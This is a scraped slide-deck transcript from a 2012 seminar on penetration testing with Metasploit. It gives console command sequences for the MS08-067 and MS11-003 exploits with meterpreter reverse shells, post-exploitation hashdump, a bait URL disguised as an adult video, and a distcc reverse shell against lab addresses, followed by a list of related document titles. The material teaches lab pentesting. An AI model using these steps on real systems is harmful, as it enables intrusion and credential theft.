Upload File

penetration testing with metasploit

prev
next
out of 35
Download Penetration Testing With Metasploit

Upload: fl3xu5

Post on 19-Jul-2015

161 views

Category:

Documents


2 download

Report

Tags:

DESCRIPTION

Penetration Testing With Metasploit

TRANSCRIPT

penetration testing with metasploitPresented by Syarif 3xu5Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang

Sunday, April 29, 12

Agenda Why & Whats Penetration Testing ( Pentest ) set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > exploit meterpreter > background session -l

Sunday, April 29, 12

Windows XP Post Exploitation

session -i 1 meterpreter > getsystem -h getuid hashdump

Sunday, April 29, 12

Windows 2003 Server Exploitation msf > search windows/smb msf > info exploit/windows/smb/ms08_067_netapi msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > exploit meterpreter > background session -l

Sunday, April 29, 12

Windows 7 Exploitation msf > use exploit/windows/browser/ms11_003_ie_css_import msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms11_003_ie_css_import) > show options msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set LPORT 443 msf exploit(ms11_003_ie_css_import) > exploit

Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi

Sunday, April 29, 12

Windows 7 Exploitation

msf exploit(ms11_003_ie_css_import) > sessions -l msf exploit(ms11_003_ie_css_import) > sessions -i 1 meterpreter > sysinfo meterpreter > shell

Sunday, April 29, 12

Ubuntu 8.04 Metasploitable Exploitation

Sunday, April 29, 12

search distcc use exploit/unix/misc/distcc_exec show payloads set PAYLOAD cmd/unix/reverse show options set rhost 172.16.240.144 set lhost 172.16.240.143 exploit

Any Question ?Contact me

website : http://3x.us Ofcial BackTrack Indonesia Community :http://indobacktrack.or.id

Email : [email protected] twitter : @3xu5Sunday, April 29, 12

Greet & Thanks To BackTrack Linux Metasploit Team ( HD Moore & rapid7 ) Offensive Security / Metasploit Unleashed David Kennedy Georgia WeidmanSunday, April 29, 12

References Sunday, April 29, 12

1. Metasploit The Penetration Testers Guide : David Kennedy , Jim OGorman, Devon Kearns, Mati Aharoni 2. http://www.metasploit.com 3. http://www.offensive-security.com/metasploitunleashed/Main_Page 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines


OWASP AppSec Asia 2008, Taiwan Penetration Test with … · 2020-01-17 · Exploitation Framework - Metasploit Metasploit provides useful information to people who perform penetration

Metasploit for Penetration Testing: Beginner Class

Operating Systems and Program (in)security · 2019-12-03 · NMAP Mapping and Fingerprinting Vulnerability Assessment OpenVAS Vulnerability Scanner Penetration Testing Metasploit

Web Applications Penetration Testing - cse.iitd.ac.incse.iitd.ac.in/~cs1160315/WebPenetrationTesting.pdf · Getting familiar with Kali Linux for our project. Metasploit framework

Metasploit Penetration Testing Cookbook -

Metasploit Penetration Testing Cookbook - Packt · PDF fileMetasploit Penetration . Testing Cookbook . Penetration testing is one of the core aspects of network security in today's

Penetration Testing und Vulnerability Scanning Metasploit ...€¦ · Penetration Testing und Vulnerability Scanning – Metasploit(able) 26.07.2015 5 Proseminar Werkzeugunterstützung

Exploitation with Metasploit - Nethemba · PDF file Prologue Metasploit Project Metasploit Framework – open­source platform for exploit developing, testing and using exploit

Penetration testing

In-Depth, Hands-On InfoSec Skills - SANS Hands-On InfoSec Skills – Embrace the Challenge ... PIVOT TO INTRANET SECURITY Penetration Testing Web App Pen Testing Metasploit DEfEND,

Metasploit Penetration Testing Cookbook - packtpub.com · project for me. For More Information: ... for token impersonation and WinAPI manipulation, ESPIA, Incognito attack, injecting

WEBKAMERA HACK PENETRATION TESZT · 2017-08-07 · WEBKAMERA HACK – PENETRATION TESZT ... Windows XP, VISTA, 7,8,8.1,10 2operációs rendszerek alatt. ... A Metasploit egy Penetration

Penetration Testing in the Cloud - USENIX · Penetration Testing Mimic real attacks ... On AWS, no m1.small or t1.micro . 12 Commercial Tools ... Snort alert. 24 Other Metasploit

Metasploit 3.0 Developer’s Guide - Network Penetration and

Metasploit - ROOTCON™ Media Server 10/Trainings... · Metasploit Framework • One of the most popular open source penetration testing tools / frameworks the world has ever known

SAP Penetration Testing Using Metasploitrepository.root-me.org/Exploitation - Système/EN - SAP Penetration... · modules for Metasploit, a free, open source software for penetration

PENETRATION TESTING - Perspective Risk · PDF fileA PROVIDER OF PENETRATION TESTING SERVICES? ... Invariably, penetration testing means that the penetration testers will

sap penetration testing sap penetration testing - Black Hat

Tytuł oryginału: Metasploit Penetration Testing Cookbook ...Metasploit. Receptury pentestera 122 Ró ne moduïy znajdÈ tak e zastosowanie przy ïÈczeniu siÚ z bazÈ danych oraz

SAP Penetration Testing Using Metasploit - Rapid7

SAP Penetration Testing Using Metasploit - SAPHelp Penetration Testing Using... · Research Paper SAP Penetration Testing Using Metasploit How to Protect Sensitive ERP Data October

Penetration testing using metasploit

Tytuł oryginału: Metasploit: The Penetration Tester's Guide · 2019-05-15 · Metasploit Express oraz Metasploit Pro ... Instrukcje NOP i NOP slide’y ..... 272. Spis treci 9 Importowanie

ЕТИЧНОВЪВЕДЕНИЕ В METASPLOIT · Версии на Metasploit Източник Rapid7 2/28/2016 8 PRO Advanced Penetration Tests & Enterprise Security Programs EXPRESS

Quick Start Guide to Penetration Testing: With NMAP, OpenVAS and Metasploit

Tytuł oryginału: Web Penetration Testing with Kali Linux ...pdf.helion.pl/kalil2/kalil2.pdf · Metasploit Browser Exploit 212 Tabnabbing Attack 212 Browser Exploitation Framework

Metasploit Penetration Testing in a Virtual Environment

METASPLOIT FRAMEWORKtaison.altervista.org/sections/04_Download/Universita... · 2007-07-06 · Metasploit Framework I 'penetration test' possono essere considerati come una forma

Armitage and Metasploit Penetration Testing Lab Raphael Mudge [email protected] [email protected] Twitter: @armitagehacker

Cyber Hunt RFQ...  · Web viewKnowledge of penetration testing principles, tools, and techniques (e.g., metasploit, neosploit,

Lab 2: Penetration Testing with Metasploit

Metasploit Penetration Testing in a Virtual Environmentitech.fgcu.edu/faculty/zalewski/projects/files/metasploitreport... · Metasploit Penetration Testing in a Virtual Environment

Pen-Testing with Metasploit

Metasploit penetration

WordPress Penetration Testing using WPScan & Metasploit · P a g e | 2 In this tutorial, I will show you how to use WPScan and Metasploit to hack a WordPress website easily. You will